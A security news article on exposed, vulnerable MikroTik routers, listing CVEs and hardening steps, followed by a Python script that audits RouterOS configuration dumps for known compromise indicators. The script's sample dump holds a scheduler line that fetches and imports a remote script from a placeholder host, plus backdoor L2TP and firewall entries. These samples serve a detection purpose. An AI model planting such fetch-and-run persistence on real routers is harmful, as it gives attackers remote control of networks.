Threat actors often prey on vulnerable devices to break into targeted networks. With most employees working remotely, cybercriminals increased their hacking attempts targeting vulnerable commercial IoT devices like Wi-Fi routers. Recently, a security research report from Eclypsium revealed that over 300,000 IP addresses related to MikroTik devices were exposed to remotely exploitable security vulnerabilities.
“These devices are both powerful, [and] often highly vulnerable. This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (C2), traffic tunneling, and more. An attacker could use well-known techniques and tools to potentially capture sensitive information, such as stealing MFA credentials from a remote user using SMS over Wi-Fi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic,” the report said.
Based in Europe, MikroTik is a popular provider of routers, wireless ISP systems, hardware, and software for Internet connectivity worldwide.
Vulnerabilities in MikroTik Devices
MikroTik routers are an enticing target because more than two million devices are deployed globally, making them a lucrative opportunity for attackers. According to the report, the most affected MikroTik devices are located in Russia, China, Brazil, Indonesia, Italy, and the U.S.
The flaws in MikroTik devices could expose users and enterprises to a wide variety of security risks. They can give attackers remote access with which to exploit and penetrate the network. The discovered security flaws include:
- CVE-2019-3977 – MikroTik RouterOS insufficient validation of upgrade package origin, allowing a reset of all usernames and passwords
- CVE-2019-3978 – MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning
- CVE-2018-14847 – MikroTik RouterOS directory traversal vulnerability in the WinBox interface
- CVE-2018-7445 – MikroTik RouterOS SMB buffer overflow vulnerability
In addition, the researchers found 20,000 exposed MikroTik devices that injected cryptocurrency mining scripts into web pages that users visited. “The ability for compromised routers to inject malicious content, tunnel, copy, or reroute traffic can be used in various highly damaging ways. DNS poisoning could redirect a remote worker’s connection to a malicious website or introduce a machine-in-the-middle,” the researchers added.
How to Protect MikroTik Devices Against Exploitation
MikroTik has listed measures to secure the devices. These include:
- Keep your MikroTik device up to date with regular upgrades.
- Do not open access to your device from the internet side to everyone. If you need remote access, only open a secure VPN service, like IPsec.
- Use a strong password, and even if you do, change it now!
- Do not assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
- Inspect your RouterOS configuration for unknown settings, including:
  - System -> Scheduler rules that execute a Fetch script. Remove these.
  - IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
  - L2TP client named “lvpn” or any L2TP client that you don’t recognize.
  - Input firewall rule that allows access for port 5678.
- Block domains and tunnel endpoints associated with the Meris botnet.
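The configuration checks in the list above can be scripted so that an administrator can audit many routers from a saved `/export` dump instead of clicking through each one. The following Python script is an added example, not code from MikroTik or Eclypsium; it assumes the plain-text `add`/`set` key=value layout that RouterOS `export` produces, and the dump it parses is a constructed sample written to exercise all four indicators (fetch scheduler, SOCKS enabled, an L2TP client named lvpn, and an input rule accepting port 5678).

```python
"""Audit a RouterOS export dump for the indicators MikroTik lists (added example)."""
import re

# Constructed sample, modelled on RouterOS `/export` syntax (assumption: real
# dumps may carry more parameters, but the section / add / set layout is the same).
SAMPLE_EXPORT = """\
/system scheduler
add name=backup-job on-event="/system backup save" start-time=03:00:00 interval=1d
add name=upd on-event="/tool fetch url=http://example.invalid/x.rsc; /import x.rsc" interval=10m
/ip socks
set enabled=yes port=1080
/interface l2tp-client
add name=lvpn connect-to=192.0.2.10 user=lvpn disabled=no
/ip firewall filter
add chain=input action=accept protocol=tcp dst-port=5678 comment="unknown"
add chain=input action=accept protocol=tcp dst-port=22 src-address=192.168.88.0/24
"""

# key=value where value is either a double-quoted string (may contain spaces
# and '=') or a run of non-space characters.
_PARAM_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Return a list of (section, params) for every add/set line in the dump."""
    section = None
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("/"):          # e.g. "/ip firewall filter"
            section = line
            continue
        if line.startswith(("add ", "set ")):
            params = {m.group(1): m.group(2).strip('"')
                      for m in _PARAM_RE.finditer(line)}
            entries.append((section, params))
    return entries


def port_matches(spec, port):
    """True if `port` is covered by a RouterOS port spec like "5678", "22,5678" or "5000-6000"."""
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = part.split("-", 1)
            if lo.isdigit() and hi.isdigit() and int(lo) <= port <= int(hi):
                return True
        elif part.isdigit() and int(part) == port:
            return True
    return False


def audit(entries):
    """Apply the four checks from MikroTik's advice and return human-readable findings."""
    findings = []
    for section, p in entries:
        if section == "/system scheduler" and "fetch" in p.get("on-event", ""):
            findings.append(f"scheduler '{p.get('name')}' runs a fetch script: remove it")
        elif section == "/ip socks" and p.get("enabled") == "yes":
            findings.append("SOCKS proxy is enabled: disable it unless it is intentionally used")
        elif section == "/interface l2tp-client":
            name = p.get("name", "?")
            if name == "lvpn":
                findings.append("L2TP client named 'lvpn' present (known indicator): remove it")
            else:
                findings.append(f"L2TP client '{name}' present: confirm it is recognised")
        elif (section == "/ip firewall filter" and p.get("chain") == "input"
              and p.get("action") == "accept" and port_matches(p.get("dst-port", ""), 5678)):
            findings.append("input firewall rule accepts port 5678: remove it")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_export(SAMPLE_EXPORT)):
        print("FINDING:", finding)
```

Run it against a real dump by replacing `SAMPLE_EXPORT` with the contents of a file produced by `/export` on the router; the script reports only the four indicators from the advisory list, so a clean result is not a full security review, just confirmation that these known artefacts are absent.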